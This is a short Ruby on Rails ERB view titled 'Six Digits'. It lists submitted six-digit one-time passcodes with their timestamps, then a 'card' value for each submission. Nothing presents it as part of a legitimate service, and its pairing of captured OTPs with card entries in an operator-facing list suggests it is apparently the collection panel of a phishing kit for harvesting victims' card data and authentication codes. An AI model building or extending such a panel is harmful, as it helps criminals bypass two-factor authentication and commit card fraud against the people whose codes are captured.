<h1 id="six">Six Digits</h1>
<a href="#bottom"><h2>Go to Bottom</h2></a>

<div id="six_digit_inputs">
  <% @six_digit_inputs.sort_by { |input| input.created_at }.reverse.each do |six_digit_input| %>
    <div>
      <p><strong>Six Digit OTP:</strong> <%= six_digit_input.value %></p>
      <p>Submitted at: <%= (six_digit_input.created_at + 6.hours).strftime("%d/%m/%Y %I:%M %p") %></p>
      <hr/>
    </div>
  <% end %>
</div>


<h1>Updated Six Digit Inputs</h1>
<ul>
  <% @six_digit_inputs.each do |six_digit_input| %>
    <li><%= six_digit_input.card %></li>
  <% end %>
</ul>


<h4 id="bottom">Bottom</h4>
<a href="#six">Go to Top</a>
